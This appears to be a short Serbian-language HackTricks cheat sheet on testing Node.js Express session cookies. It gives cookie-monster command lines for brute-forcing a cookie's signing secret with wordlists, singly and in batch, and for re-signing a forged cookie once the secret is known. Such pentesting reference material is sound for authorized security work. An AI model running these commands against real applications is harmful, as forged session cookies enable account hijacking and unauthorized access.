NodeJS Express

Reading time: 2 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Alat https://github.com/DigitalInterruption/cookie-monster je alat za automatizaciju testiranja i ponovnog potpisivanja Express.js kolačića.

Jedan kolačić sa specifičnim imenom

bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session

Prilagođena lista reči

bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst

Testirajte više kolačića koristeći batch režim

bash
cookie-monster -b -f cookies.json

Testirajte više kolačića koristeći batch mode sa prilagođenom rečnikom

bash
cookie-monster -b -f cookies.json -w custom.lst

Ako znate tajnu, možete potpisati kolačić.

bash
cookie-monster -e -f new_cookie.json -k secret

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks